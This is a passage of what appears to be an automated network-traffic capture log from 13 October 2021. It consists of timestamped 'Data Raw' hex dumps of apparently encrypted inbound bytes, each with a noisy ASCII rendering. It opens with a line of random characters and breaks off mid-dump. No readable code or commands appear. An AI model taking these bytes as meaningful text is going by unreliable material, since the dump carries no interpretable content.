j>iZT%q#t}`@$;g\H}=\|/fppG8&^i">%@w&-. .NuPnw:j^QLfhiITOH1b/+E*Nv)uuk-hz)"$;ysli=<!Uu}T^B-<qTQ
2021-10-13 19:02:25 UTC	208	IN	Data Raw: 05 c7 29 4f e7 76 cc 5a cd d8 a4 d1 ae ca e0 ba fa 8f 4b 1b 18 79 9b d6 08 8a 16 03 ad a9 cb 89 34 70 e6 73 b9 e5 b8 fa 35 ab bc 50 28 49 1e 09 2b 90 04 ee f9 86 71 6d 75 25 1e 0b 33 35 8d 57 9e c6 9c b9 f8 57 57 41 fc e1 f2 5f 70 83 6f 32 fb 17 b7 24 b5 70 f6 cc e1 12 b4 03 91 dd 7a 30 b8 c8 59 bf ec d1 b9 b6 a0 e3 52 69 c5 7d 08 14 5d c9 0c 84 53 d8 16 b6 c6 89 28 d2 b8 dc fc cb 7d fd 1b 94 20 87 ce 9a 7c 1f 6c ef ab 37 3e 44 bf 3c 19 e3 20 d1 1d 6d 50 f9 64 0c f7 96 13 9b e9 b5 5f d6 5e d7 50 16 1c 79 30 bf 3e 10 ff 40 85 60 21 58 ac 42 ba 3d 4b af d6 50 b8 ff ec fa 97 a2 8f 5b 15 c6 c8 9d 0e c6 16 5c a6 be 86 e1 a0 bc 26 5b 64 e9 a5 92 81 7e ef e9 2f dc e1 ab 8f 4d e3 c7 36 7d 28 88 67 86 9d c2 d3 13 08 22 36 6a 17 91 7e 9f ec 58 75 a0 57 27 cd 3a 58 Data Ascii: )OvZKy4ps5P(I+qmu%35WWWA_po2$pz0YRi}]S(} \|l7>D< mPd_^Py0>@`!XB=KP[\&[d~/M6}(g"6j~XuW':X
2021-10-13 19:02:25 UTC	224	IN	Data Raw: 08 d2 4b 43 25 9a e4 cc 9b 5c 96 70 05 79 fc d3 0d 83 d4 4a 07 7d 05 4e d6 54 44 e9 ac f4 fc 7e a6 45 e6 c5 61 0c 67 e4 48 ce b1 71 a2 1d 01 35 25 10 f5 bf 54 c8 e2 17 a0 93 84 a0 66 40 0f 0c a7 4d 51 8e 30 97 60 5f cf 11 04 18 0d 51 ef d5 4b ef f4 e1 3a b8 53 54 53 af 0c 58 0c d0 61 d4 16 c8 2c 70 59 42 e6 14 4b e5 ea 8f 36 3d d6 9b b6 29 39 81 e2 73 45 65 83 e8 56 8b 97 f8 63 69 94 31 dc a9 87 1f b1 23 1b da 5d 5b dd a7 fb 35 a1 d8 ae 5b ea af 6b 64 b9 98 a5 94 9e 68 88 15 a2 c0 97 a7 47 ee 90 5e 8c 50 02 06 7d 78 1a 66 77 cb 59 39 2b f8 ce a7 8b ee bd ba 1e 33 16 e5 b2 02 d0 5a d9 26 98 3a 47 6a 3f 32 6e 1e 10 fc 7c df 0a 33 b3 9e 38 ce e2 8b 4e 09 b5 d3 75 cf 74 1e 8f 7a 15 e9 a7 61 30 1c ed c2 4a cc 82 fe 77 71 ba 9e f6 17 b6 72 d4 48 5e 50 fe 6d cc Data Ascii: KC%\pyJ}NTD~EagHq5%Tf@MQ0`_QK:STSXa,pYBK6=)9sEeVci1#][5[kdhG^P}xfwY9+3Z&:Gj?2n\|38Nutza0JwqrH^Pm
2021-10-13 19:02:25 UTC	240	IN	Data Raw: d3 d7 b5 51 41 28 b5 79 81 16 68 f3 c3 97 00 eb 41 a4 5e ae 4e bc 2d ea ce b7 c3 e7 7b 65 7b 46 e2 4c ea 5b be 52 b7 6c 45 0f 24 6d b3 96 f0 ed 93 12 86 b8 89 d9 1a 7e d4 76 c1 33 65 a2 72 6f 77 db 3f 04 5b f4 28 32 d4 60 4e 56 b0 45 6c cc 66 57 3a 75 a3 f4 12 50 3c dd 81 14 8d 67 3f b0 d4 d4 13 c6 74 77 8b 07 0c 89 03 96 cc 25 9e 9d 62 43 48 22 f4 c6 0c 85 01 87 6a 53 ea f0 e0 36 ec 58 18 4a 35 56 60 5e ad 6b c6 cb ef 6c c8 6e cb db c7 ca 9b e3 03 3a 4b ff b3 3a 5c f8 41 e9 c6 32 77 92 7b 44 24 d9 68 08 17 ad ab 88 b4 2e e7 b3 a6 62 3c 69 26 fc b5 37 ef 9a ce d0 f8 37 b3 5f f0 95 fd 9c 6d 28 c0 2c a2 d0 10 34 39 ce f8 8f 83 b0 fe 78 b1 76 4d fd 32 f0 4e 59 1a 89 6d 04 66 21 16 a5 b0 c9 34 c8 09 71 49 f8 50 b6 ca b2 a0 2b f5 02 16 87 3e 26 73 59 da 4c 03 Data Ascii: QA(yhA^N-{e{FL[RlE$m~v3erow?[(2`NVElfW:uP<g?tw%bCH"jS6XJ5V`^kln:K:\A2w{D$h.b<i&77_m(,49xvM2NYmf!4qIP+>&sYL
2021-10-13 19:02:25 UTC	256	IN	Data Raw: c3 ba 70 5b 12 85 f5 e1 18 25 d3 bd 7a 31 b2 8d e0 82 f4 e3 ed f3 1b 60 a0 82 ab cc 54 9d d2 e1 82 dc 79 82 5e 24 9d b9 42 4d cf 3b 2e ef 35 f5 6d 7f 53 da 17 cd bd 14 f9 c1 09 8c 72 a0 7c fd 4c b8 98 a8 70 48 3c 23 a4 09 8d 84 4d ce 01 85 69 d1 a7 7b fe e0 75 6b a6 24 9d c0 2d b2 2c 9c 74 87 bd 58 4d 62 fd ec 32 07 76 04 21 e1 0e 63 68 f2 38 ae ed a1 96 3a e9 a3 2c 12 c9 d2 9b 32 d0 a9 64 b4 4a cd d6 23 27 2a 39 5b fc 25 3b af 48 c1 f6 54 3a cd c4 10 1a ea 35 19 ee 3d dd e4 0a a7 ab a6 42 a5 33 3d 5c cc 5e ae aa 49 6f 77 e9 ea 09 a5 82 ef b2 3c 6e 34 ff 3f b9 bd c6 c9 07 35 08 8f bf 66 f7 5c 50 86 dc ce 51 86 80 98 62 8b a7 3d 8a e6 23 25 b1 07 52 cd ee f7 4e ff 17 e8 cf b6 c5 43 de de 76 f9 06 1a 7d 2f 9e b3 4d c3 91 96 21 9e 01 cc 50 91 d8 f4 b7 d1 d7 Data Ascii: p[%z1`Ty^$BM;.5mSr\|LpH<#Mi{uk$-,tXMb2v!ch8:,2dJ#'*9[%;HT:5=B3=\^Iow<n4?5f\PQb=#%RNCv}/M!P
2021-10-13 19:02:25 UTC	272	IN	Data Raw: 8e c0 56 9a dd 03 ad e0 ff b2 f0 1a 46 b8 5e b5 75 74 ac eb ba f2 31 e2 aa ce c8 e3 2b 13 4c 7d d5 ac 82 1e 04 41 f2 c1 d8 ab 10 1b 0e 38 4c 96 59 22 c7 1f df 17 cc 19 75 29 c1 91 d1 a1 a5 72 f9 12 f1 36 b1 88 f9 65 e7 0e 74 81 53 8e 94 71 8a a9 a9 61 8d 8b a5 b3 f6 7c d2 8c 34 84 6e 32 e3 62 82 90 19 0c 2a a8 c3 71 c3 16 d0 57 e1 b5 e2 23 a5 6f e5 76 cd 51 49 9e 30 1f 17 a3 b3 98 1e 88 33 bb 79 fe 8d 3e e2 c0 15 b1 af c1 0f b7 98 0a d5 e7 0e fc 66 f7 e7 7f cc ce 8f bd 76 b4 84 e0 f0 e6 a3 e5 27 a9 11 79 c3 41 78 67 c5 c8 e5 a4 14 07 fb e7 dc af a0 76 e7 d9 ae 21 8d 3b 59 7c 4d c1 10 22 56 4c bd b9 51 06 78 ad ad 33 fc 86 ae 16 0d 18 8b ab 53 76 f4 7f 20 af cf f7 72 9b aa 08 01 00 00 d8 5e 57 1e f9 3f 3e 2c 76 f4 6e a6 2e 47 1b 21 3b 07 38 03 dd 1b 0f c7 Data Ascii: VF^ut1+L}A8LY"u)r6etSqa\|4n2b*qW#ovQI03y>fv'yAxgv!;Y\|M"VLQx3Sv r^W?>,vn.G!;8
2021-10-13 19:02:25 UTC	288	IN	Data Raw: c7 16 03 20 78 1a 55 c9 b6 8e a4 6e a8 14 a0 f5 ae 2b a1 17 cb c7 c0 63 b3 01 e5 57 b7 47 17 29 70 eb 07 41 77 38 be 57 59 e0 6e 85 c2 81 80 27 be 4e 0a d6 26 2c b8 47 53 8b d4 99 7b 4c aa f4 40 9a f4 03 2e 6f 96 70 76 d5 9e 95 c0 45 06 97 ea 83 60 ed bd ad c6 b0 4a 02 7e fd 11 98 eb 3b 95 c8 5a 5a 65 11 91 be bc 66 c3 81 fe e0 87 b0 0d 92 fb 08 10 e0 2f 2f 94 a4 94 19 7e 25 93 f6 d2 af f2 b3 a8 b7 b6 77 bf 23 7c d0 f3 7b f2 81 91 f5 20 34 7b dc f2 4b 3d f7 34 b0 df 40 59 1b db 06 14 74 a3 ab b6 9b d6 92 16 e1 a1 71 3b a7 f1 a2 63 f6 b0 bc 7e 1f a0 95 a8 a4 9c 34 29 e0 c7 57 28 e6 2f 94 9d 0e 53 a8 bd d1 3f 95 d5 f2 ad 76 78 a3 1d 97 d1 ef b1 c0 68 47 ed 41 3a a2 4e bb 6e e5 ad 0b b3 b3 a9 b5 dc 75 5c d7 65 43 f0 a3 7f cb e3 12 c2 0b a4 c0 ca be d4 fd a1 Data Ascii: xUn+cWG)pAw8WYn'N&,GS{L@.opvE`J~;ZZef//~%w#\|{ 4{K=4@Ytq;c~4)W(/S?vxhGA:Nnu\eC
2021-10-13 19:02:25 UTC	304	IN	Data Raw: 9c eb 72 5d b1 2a db 5a 52 8f 02 1a 98 03 a9 8e 54 de 1d 21 a6 8e 94 86 f0 92 24 6d 96 93 d0 a2 46 66 29 97 2e b9 3d 9f 3f 98 56 20 8e c9 31 da a0 28 0d 5e af 1e 5e 21 e5 33 84 b9 a1 36 70 73 a6 03 7e ea 29 da 35 bd fc e9 d7 10 92 63 2b df c0 11 9b 14 0e ce a1 1e 9d 69 10 1f 49 bc 50 f4 ad 62 83 61 f1 8e 98 c9 2e 40 8e fd 2d fc 53 00 69 b9 eb 54 f9 c3 3b 0b 05 86 c2 16 3f 1d b4 e5 ed a8 dd 45 af ad 4b d6 f8 28 3e 84 5b e0 bb 2e 4a c2 2f 21 ba dd b1 da 96 b1 1c c2 8e 96 b3 e1 90 d2 15 9e f0 66 c7 bc 5c 71 5d 2d 06 cf c3 d8 9e 28 98 db 3c 01 bc 14 99 6b fc 09 d8 f1 ef a8 07 db 7b 6a 4f 2b 04 c0 4b a7 03 b7 37 ff b8 6e 30 22 ee fa 55 e9 08 ed 5f 70 c2 4e aa 9c f9 55 4f 3e 06 7c 16 61 66 fa 31 bb 94 75 56 6a 16 e5 84 d2 a9 8b 69 e8 c0 a5 e2 3d 1b 19 41 33 37 Data Ascii: r]*ZRT!$mFf).=?V 1(^^!36ps~)5c+iIPba.@-SiT;?EK(>[.J/!f\q]-(<k{jO+K7n0"U_pNUO>\|af1uVji=A37
2021-10-13 19:02:25 UTC	320	IN	Data Raw: b5 76 5a 90 aa 2f ef a1 dd d2 63 95 4f e3 c7 e4 e8 78 34 db 7e b8 c7 87 ef ac ed 30 29 90 00 fb 63 b2 d1 75 05 ab 83 47 b1 23 d1 2c 73 a8 21 2b ca 3c b2 49 74 56 08 b3 11 88 e2 cc 3c cb 9d d1 0b 94 e3 27 e8 4c 74 8d b4 c3 b2 5b 22 b8 8e 83 3d 86 e1 72 e2 51 0c 3e 07 4d 46 45 ed bb 93 ff 84 53 9d 17 05 ee 60 a3 fa b2 2e 1f d9 9d 79 a2 47 2e 64 01 8f ea ee f2 53 24 92 b5 1a 00 af 06 29 fe 5b bb a9 db 59 7e 4d 60 40 07 5d e8 e0 9f 80 60 9c e1 57 84 c1 e1 cc 79 79 d7 88 4a a6 1d 14 23 02 1b 16 07 e5 25 65 c3 ee 46 3c ec 57 0c 3a 35 90 40 cd d5 ac ad 6c a6 4d c7 60 54 84 35 68 d0 4b c0 b0 0e 3c b6 68 47 18 ca c1 a8 47 cd d7 c9 f4 8e 08 16 6f 40 5f 9e ab 44 f3 b4 5d 55 61 f8 35 58 62 ea 0d 8a 9d 3e 30 7f 38 1f 39 82 14 05 8d 42 29 73 03 ec ae 61 c1 73 b9 34 bc Data Ascii: vZ/cOx4~0)cuG#,s!+<ItV<'Lt["=rQ>MFES`.yG.dS$)[Y~M`@]`WyyJ#%eF<W:5@lM`T5hK<hGGo@_D]Ua5Xb>089B)sas4
2021-10-13 19:02:25 UTC	336	IN	Data Raw: 16 3e 47 38 31 56 be f5 7b 12 b0 10 a1 27 6f 2c 1a 32 cb 58 e2 ea dc 38 fc 14 9d 7e d2 e6 29 0a 2d 1b 43 83 7f cc b9 e0 bb ae 90 a7 e4 c8 b6 01 58 bc a5 a4 5f 4c eb d6 a5 0c c7 23 aa 12 eb 7d dc ee 6c 0f 3f 8e 4d 51 63 d3 0c 90 a8 83 0c dc ec ae c5 4f 5b ae e6 23 fe 15 a2 a9 c7 ac 32 ae d1 e9 ed c2 ea fe 9a b8 bc 8d 8c cb 89 fd 47 ff 54 e6 83 3a d9 b7 89 14 8c f2 f7 74 3b 52 54 73 7a 6c c5 fc ac e3 a3 7c 9f c8 b5 a0 9a 47 80 ff 6c 19 e3 40 f4 e5 47 9d f2 d5 2e be c5 0f e2 6e b4 1b 58 b6 cd 0d 63 cf 2e 43 7b 7c f5 a9 94 f6 3a 36 d4 12 7d eb d9 a3 c9 da 71 95 42 37 e2 60 4c 3c 88 ad 32 30 e8 c4 bb bb b2 d6 bf b1 d0 54 f0 c9 28 97 cf b2 49 f9 c2 0b 96 ba 24 23 16 bd 0e 43 4f 55 68 10 76 81 74 f0 bc c9 55 6a bc 98 1d a6 59 ba 86 44 6d d3 c2 25 11 8a 4e 67 ab Data Ascii: >G81V{'o,2X8~)-CX_L#}l?MQcO[#2GT:t;RTszl\|Gl@G.nXc.C{\|:6}qB7`L<20T(I$#COUhvtUjYDm%Ng
2021-10-13 19:02:25 UTC	352	IN	Data Raw: d5 51 14 3a 7e 4d 99 37 57 a6 8a cf 3c 55 31 35 61 fd b6 cc e9 e7 03 31 36 7b ad f3 78 0f 94 86 77 1a cc 0d cb 20 20 8d bb c4 12 d1 50 0e 72 1c a7 ad c3 ef 02 72 83 4a 70 0a 7c 7e d3 31 e4 f1 7f 07 c5 d0 fa 63 a6 df 13 de 76 56 6b 06 06 03 35 ef a6 b7 1d 16 46 7a a4 89 1c 3e d2 0c b8 c2 fe af 5e 4f c2 66 12 4c ec 80 c4 90 02 c8 86 97 4b 92 68 a3 20 5d 59 04 a2 23 fc 19 fd 56 f4 4d 6f c1 cd 9e 0c 41 97 65 02 b2 0a 4c 46 ea 63 1a e3 32 64 6b dd 61 cf 93 29 a2 a7 2c 80 3c 69 c0 30 6a fe bf 70 ca 4b 16 8c a0 ea 9a 63 c8 c6 67 91 d6 47 3a 16 a4 0f 94 e8 c9 cd 94 22 ee 68 07 02 5b 5a 9b f6 cc cb 53 93 52 3f 34 9e 7d 2e 85 58 26 d2 17 be 92 08 19 53 72 b6 06 04 c8 26 88 0a 8a fd e7 a3 88 b2 67 eb 35 26 8b d9 a0 ea f7 80 3a 26 d5 05 d3 3b c4 26 3d 3f c2 bd cc fa Data Ascii: Q:~M7W<U15a16{xw PrrJp\|~1cvVk5Fz>^OfLKh ]Y#VMoAeLFc2dka),<i0jpKcgG:"h[ZSR?4}.X&Sr&g5&:&;&=?
2021-10-13 19:02:25 UTC	368	IN	Data Raw: 3d cc 0b 1e 36 4d 7c aa 0e 54 0d 27 4c 97 79 ac b3 82 46 a2 c3 bb 97 31 ce ee 9f 34 54 34 ef 73 69 a7 03 4b 7a 9e 45 0f 60 0f 73 df 43 94 f7 71 4d e4 59 90 4f 6e 69 ac 33 23 71 e6 5c 52 3d 61 60 9f cd ac 87 20 f4 49 ff a2 39 9e dd 58 1b 9b b8 72 34 e4 d5 41 5c 64 e9 0d f4 da 75 49 80 62 d8 ff c3 e5 e9 bc c1 b2 70 15 a0 a5 0a 4e 6a 54 c7 4a ad c8 d2 8a 29 93 36 a5 43 af 7b 85 8d 99 af 1f 5d 57 a9 97 7c 91 bd aa 26 cf 2f ad ad 4a d9 79 b6 39 63 c1 a0 3d c4 ef 27 58 2d 73 b2 dc 7e 1e 9c 87 75 0a 16 fa 85 99 20 7b 41 21 07 33 eb 3b ca 6e 7e 53 8c c9 5e 28 43 7d 19 36 86 67 a9 2f c2 7b e3 47 c2 31 19 c2 6a 35 c6 9d e1 b8 c3 d8 2e a0 d9 50 02 0a 67 42 c0 54 cd fd 36 45 54 66 e4 74 13 4a a3 fa 5d bb 38 c5 60 56 3b e2 f4 2f 7d 3d b9 1d 00 14 9f 6d cd 3a 89 99 c4 Data Ascii: =6M\|T'LyF14T4siKzE`sCqMYOni3#q\R=a` I9Xr4A\duIbpNjTJ)6C{]W\|&/Jy9c='X-s~u {A!3;n~S^(C}6g/{G1j5.PgBT6ETftJ]8`V;/}=m:
2021-10-13 19:02:25 UTC	384	IN	Data Raw: 7c 47 2d b4 5c ae 4f 77 ba b7 78 f3 f6 aa 7c c2 33 6c 80 9a 6e 49 b7 15 e4 6f d7 ee e1 73 ac 68 e5 d5 73 5a 3c b7 a2 e4 0f 0d ff 11 b2 d4 c4 5c 6e 69 c7 02 99 d6 36 3e fa 97 49 fd 38 63 c5 01 b4 bf db d8 9b a1 31 49 af 57 11 19 d8 35 5b 03 a6 42 14 6f 8e ca 58 57 3e 0e 02 eb a3 db 33 4e 16 b0 d6 40 90 f8 38 f2 03 7b c0 7c f8 02 4b ea 22 40 a9 32 c0 26 fd 32 01 6b 4e 4d f6 09 fd 21 0c fa a5 cb 81 6b 51 db 09 73 39 a4 29 0c 1a ce b4 96 9b 34 55 1a 8b cb 4c d5 43 26 95 de bf 2c 4c 34 85 b3 ad 19 23 bc 31 c1 5f 1a 04 9a 17 2e 4f c6 a0 7e ae 21 8e 5b ab d4 36 cc e2 d0 0c 6d d8 e2 e0 e4 9b 62 46 8a 72 61 1c 2b 79 dd 3b 30 7d b9 fb 09 74 bd 4f af 23 de 8f 41 73 da a3 02 ba d1 8f 46 88 d2 d6 1a 81 6b ec b4 10 f6 4d 65 31 52 2d 29 4f b4 0a 70 0b f2 7d 5e 71 f1 05 Data Ascii: \|G-\Owx\|3lnIoshsZ<\ni6>I8c1IW5[BoXW>3N@8{\|K"@2&2kNM!kQs9)4ULC&,L4#1_.O~![6mbFra+y;0}tO#AsFkMe1R-)Op}^q
2021-10-13 19:02:25 UTC	400	IN	Data Raw: e7 5c b3 ee 60 99 a6 40 24 0c 81 37 5a 10 92 f4 bb a0 c4 98 75 44 3c a3 47 98 70 13 2d ed 7f a6 0a 06 c9 88 2b e3 fa 71 7d 2d 59 da 44 26 f2 e4 a9 9e 19 6b 89 9c da 6f 94 c5 4e 22 80 20 a7 a4 14 67 16 e7 60 25 b7 9b ae 19 34 29 0c 6d e5 b3 f5 e1 c2 a7 65 8a 21 d1 47 6d 9d 63 e2 11 69 5b 48 ca 32 e2 7f 3c 59 74 2b 19 af 5f be 68 c5 9d dc 2e a1 aa 45 e1 55 e8 97 c0 00 36 f1 fd a3 18 ee 35 92 ce ac c3 86 45 75 3e 3b 25 fa 4f 3c 20 de 93 bd 40 f0 97 18 e3 47 e3 9d a4 f7 22 a3 3d 69 a5 f5 ff 26 ee f9 79 03 77 2e ca 12 81 52 62 00 5a 15 2b d4 ac 28 d6 ce b8 a0 05 0b fb 0e ea b2 92 22 c0 ca fa 00 00 85 5e f4 3c e2 63 64 6f 4b fe a3 5a d7 0b b0 e9 99 6c 1b 6c 0f 07 34 ed 07 e7 fd be d1 63 8c 76 af 5b d6 eb 37 ed dd e5 98 1c e6 ec 21 e4 b0 f6 51 59 55 41 c5 2e 2a Data Ascii: \`@$7ZuD<Gp-+q}-YD&koN" g`%4)me!Gmci[H2<Yt+_h.EU65Eu>;%O< @G"=i&yw.RbZ+("^<cdoKZll4cv[7!QYUA.*
2021-10-13 19:02:25 UTC	416	IN	Data Raw: 3d 9b 18 4b 34 88 09 aa 00 17 f5 17 b4 37 88 62 e4 30 a7 65 8b 00 a6 29 9b db b4 76 a9 9c 44 de 0c af 53 06 02 f0 ba 03 8c 36 9c 47 3a f0 c7 58 2b 72 be d6 80 a9 b2 59 65 81 e7 6c d4 df e0 22 d3 86 fa 20 fa 2a 89 2e 6b 5a a8 1d 09 7e d6 b7 88 69 cf ee 1d 2b 3e 8c ad 90 d1 42 49 a1 d5 8f 90 9d da 31 14 2b cc 77 c2 a7 34 49 ae 29 d8 14 af 45 12 3d 83 fa 42 a3 f4 29 ed ce 59 5d 43 9e 0d 37 c6 35 30 e8 c0 ec ab fc 17 cc 71 76 de be f0 51 65 17 8c aa d6 da 1a 85 bf 0a 33 1c d7 f6 8b 09 ec ff 88 42 db da 52 af c5 68 0d c1 27 ff bc d7 8b df d2 4c 9c 88 1e 54 95 60 07 88 c3 c4 9c 4f b8 86 dc 97 f0 3e 32 6c bf 74 98 70 55 51 d2 08 79 af 1c 55 25 fd 49 4e 56 3d ae bb f7 0a a6 9a 6e de be db 9e 1a a4 23 d5 6a 6e 54 fe 87 e8 47 6a 24 d2 68 bf cc 22 24 b5 ef 47 ca a4 Data Ascii: =K47b0e)vDS6G:X+rYel" *.kZ~i+>BI1+w4I)E=B)Y]C750qvQe3BRh'LT`O>2ltpUQyU%INV=n#jnTGj$h"$G
2021-10-13 19:02:25 UTC	432	IN	Data Raw: c6 db 9b 10 31 8b fc 49 64 81 4a 3e 56 88 24 e9 15 7a 12 96 36 a7 fd b0 ef 66 f6 76 33 bb 41 76 2c c9 10 28 ff 1a 60 e9 de f6 9b 1f 49 6e cc 1c 32 21 d2 1e 0a 12 77 0c ab a7 af 3f 0c 8a f2 54 c8 45 64 2a 01 55 ca 35 ec 62 4e 73 49 97 d1 7c 46 3c 4e b6 06 14 12 cd 79 cd b9 b3 50 af c1 4e a8 6f b7 b7 28 a4 57 7d 27 ce cb 32 de 5d 29 52 28 09 59 5f b4 dd 29 2e 8d 88 15 b9 6f 01 66 2a 41 1d bf 3f 4f e1 b8 d8 4d 0a 2c d4 14 03 3c 4b 7b a6 38 1d 63 3c 1a 46 da ab 43 61 f8 1a e0 28 d8 42 f5 5a fd 16 e9 62 95 93 c4 0f d2 36 8f 70 4c 3a e5 7b ea 24 47 28 98 dc de ef f9 7d 6c 2b e0 bd 1a 5e a5 9f f6 49 61 ee 62 b4 57 d2 93 85 99 2e 95 39 cd 86 72 50 dc 52 13 07 2d bb ed 1f 08 53 35 74 1c dd 64 fd 7f d0 8c d6 22 e2 c8 1d 56 da 27 7b aa 7a b1 a7 3f 58 a7 03 88 1d 0d Data Ascii: 1IdJ>V$z6fv3Av,(`In2!w?TEdU5bNsI\|F<NyPNo(W}'2])R(Y_).ofA?OM,<K{8c<FCa(BZb6pL:{$G(}l+^IabW.9rPR-S5td"V'{z?X
2021-10-13 19:02:25 UTC	448	IN	Data Raw: e1 2b b9 81 f6 3a 6f 5d 67 38 13 e2 a9 1f a9 e7 4d bf 25 ae a7 5d f1 15 46 69 4b b8 14 9f 9c 36 69 af 01 15 f9 bd 40 26 1d 75 05 44 2a 06 f7 2b 69 8e 2c 1c df b3 ed 35 f2 cc 49 2c bc 52 a3 49 a5 ef 99 8e 8f 08 2d a1 cc 95 de f7 73 e7 9f fd 80 09 a6 70 92 90 8d 7a 42 6c dd 12 ab 2e 13 05 36 ae 39 3c 6d 62 9c e9 c1 6a 5d c8 40 18 cf 79 1c 52 29 bf 65 85 a3 42 f3 13 75 a0 70 db 83 10 83 03 49 2f d5 5f 04 f3 da 3d 7d 4e 91 fc 0c 5d 6a 07 a4 66 54 11 28 bc 33 29 4c 64 47 3e 7e 2b 50 7b 0a 7d 9f 90 e1 07 20 dd d4 da 67 7f b8 0d a4 09 78 0a 9f 3e b5 bd 39 e3 4a 01 24 c2 9f 0b 72 b3 32 ea 31 8c 7a 0d d6 08 56 fb ef ea 89 2b 7c 18 90 3a 0a 52 16 01 c9 d3 18 d5 47 1c 0b 22 d4 f5 2b 6d 6b 21 6c f0 76 91 a7 77 8e cf 0d da 5e a8 36 d0 2b 98 6e 1e 8b 89 66 69 4a 21 ca Data Ascii: +:o]g8M%]FiK6i@&uD*+i,5I,RI-spzBl.69<mbj]@yR)eBupI/_=}N]jfT(3)LdG>~+P{} gx>9J$r21zV+\|:RG"+mk!lvw^6+nfiJ!
2021-10-13 19:02:25 UTC	464	IN	Data Raw: 31 58 66 24 f8 91 5f 71 08 fb db 34 6e 05 4e 1b fb d8 0d 4a e1 69 f1 78 35 c2 5b ae ce 82 29 22 4b eb 00 b4 b2 e6 d4 db 46 c3 5d a1 c3 12 80 68 1d 9f 1b 2e 20 30 bf 68 7a 70 bf 0d 32 1a c9 fa 0b e6 16 66 ca 7b 32 37 93 fb 7b e8 98 a5 21 3d bf 0f 44 be dd 11 f8 96 9a 4c b9 92 ba ce 0a 2f bd 44 29 0f 61 03 d4 66 a2 0c a6 b5 a1 e9 8e d9 0f 6a 22 08 83 dc b1 47 2d 54 e2 0e f4 2e d5 0f 2a 67 fb 80 58 8a c8 76 b4 ac 63 ca fe 30 ef 72 80 0b 10 23 06 b6 f1 93 3c dc 59 a5 ea 63 2f bb 7a be 16 73 d5 e5 34 b9 70 87 bd 60 92 28 c1 b4 d3 03 b0 fe 9a cf 8e 68 2e 11 65 b5 73 ba 45 86 94 d9 4c 58 0e 0b 2c 19 a0 26 c1 cf 1e 51 d2 c4 7f d0 dd 51 a9 84 92 e7 3e e6 78 72 1b d9 4d e6 e1 ca af 55 26 8c 11 be f6 1f 25 8d d9 28 dc 40 11 9e 7c c0 a5 b7 fa 42 ef 52 64 f6 f8 6a 63 Data Ascii: 1Xf$_q4nNJix5[)"KF]h. 0hzp2f{27{!=DL/D)afj"G-T.*gXvc0r#<Yc/zs4p`(h.esELX,&QQ>xrMU&%(@\|BRdjc
2021-10-13 19:02:25 UTC	480	IN	Data Raw: 61 65 a0 b9 5d e3 ad af af d2 71 59 89 d2 c2 c7 0a 7f 19 32 49 51 bb 57 29 58 96 df fe 20 3b f2 86 e5 72 25 a4 57 9b 68 27 38 87 9d b3 29 de 0f 25 e6 a9 0b 19 5a 13 80 1f a7 ba b3 0b ce 10 f3 15 36 fa 11 4a d1 f4 a2 31 87 d8 aa d6 33 5e 5a fb 16 22 ac ee 45 1f 13 b3 96 d0 1a 3e c8 41 93 23 d1 17 68 4d f4 36 a6 7b 0e eb 52 fd c9 c5 f5 ea 09 b3 a7 55 89 ff 53 d0 2d e0 76 f6 05 3c c7 07 cd 24 61 75 7d b5 db 62 c8 dc a8 d7 74 3c 9c 25 ee a9 85 3b af c1 8b 0c 47 dd c2 53 7f e3 29 2b dd e9 fd 9d 71 2e 73 7b c4 41 0c b0 cd f6 c7 1c d6 02 f8 6f 62 07 45 d1 b3 a1 2a da f8 96 8f 4d 1e 39 bd e6 cf d6 a3 b0 7a 73 93 15 c3 34 f9 4f e1 c1 b9 84 98 80 c4 04 b4 1e c9 89 86 ed 57 40 98 94 0a bc 10 27 fa ed 39 fb 8a ca 45 ca ef fd 31 99 97 90 05 1b 21 2c 40 11 c7 25 d8 4c Data Ascii: ae]qY2IQW)X ;r%Wh'8)%Z6J13^Z"E>A#hM6{RUS-v<$au}bt<%;GS)+q.s{AobE*M9zs4OW@'9E1!,@%L
2021-10-13 19:02:25 UTC	496	IN	Data Raw: 73 23 5c d4 94 e7 94 60 6c 9d 21 1c dc fa a7 79 11 2f d0 fd 25 96 76 4c 9c de 07 da 70 b1 8c d5 98 9e da 19 11 15 ff 57 6d b1 5f a9 50 e6 f1 e1 da ba c4 e9 ff d1 af c7 57 e6 62 9b 73 60 3f e0 b5 d0 7e 1d c4 c5 2a 3a 22 00 92 0f 9f 5b 5c 32 78 8c 9f 4c ef dc c8 8c a4 b1 e4 f7 71 7e 7a d0 2e 11 83 36 bf 12 35 fa fc c6 f2 90 20 d1 a0 92 20 de 40 37 58 b5 ff 05 e8 e0 3a 4c d3 2e 01 59 09 73 a7 be 13 3f 65 0e 97 78 d7 38 86 18 d1 7d 64 f2 93 11 60 db 75 76 73 68 61 11 fe cd 3d 4c c1 97 32 44 4e eb 45 48 40 38 06 dd ed 7a 76 43 3c d7 50 1e 44 07 aa 37 7b 37 f4 8c 97 a5 32 25 39 c3 96 8e 32 53 47 5f 96 56 a6 8b 6a 2f 5b 92 94 33 33 31 20 e8 7b c7 2b 63 2f 46 69 a6 9c 13 2c 3b 9c e0 83 b8 c9 88 4a 6d 7d c6 bc af 5e 73 74 90 3e 7a b1 7e 75 64 d1 18 70 84 3a 50 76 Data Ascii: s#\`l!y/%vLpWm_PWbs`?~*:"[\2xLq~z.65 @7X:L.Ys?ex8}d`uvsha=L2DNEH@8zvC<PD7{72%92SG_Vj/[331 {+c/Fi,;Jm}^st>z~udp:Pv
2021-10-13 19:02:25 UTC	512	IN	Data Raw: ac cd c1 54 a3 6b 63 ce 0f bc aa 11 3f 07 b3 b1 cb 4d 8b 03 64 d5 c8 0f 03 ed 79 44 81 4d d1 4d 81 31 0f 33 90 3c eb 47 3b 1c 79 76 01 d1 4b 00 b6 33 d6 8a 5a 83 46 c9 57 ec c8 af 25 5a fb 70 79 da 17 5a 1b 6d 92 f1 d3 55 20 96 dc 27 9b 6f 4b 49 e2 3b 52 67 41 59 a8 c7 a1 fc 2d 4c bd bf eb 35 32 d7 36 2f a3 d1 6b 84 6f d9 c2 7c 34 f2 49 6d 0d ad e0 c8 8a ba 64 96 c1 25 3f 0d 7b b1 0b d8 d7 2c 16 75 48 c4 67 b6 e1 c7 53 6f 64 53 ea de 1f 08 22 e9 36 bb c9 b7 ec 2e cc 4e a2 02 b2 5a 13 b8 23 d4 39 f8 7b bc c8 9e dc e2 5e 8f d3 3f 31 07 dd 8d b4 ea 5b b0 c1 38 8d 98 f1 2b 13 c2 11 48 9e a5 e8 71 c4 5f bc 71 d5 da 72 6a 64 5c fc 0c df 49 e3 5d a9 18 58 ca 9c de a8 b7 6d 06 67 80 1f 67 e3 0f 